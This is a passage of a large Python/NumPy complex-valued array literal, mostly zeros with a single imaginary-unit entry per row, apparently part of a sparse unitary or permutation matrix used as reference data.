0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
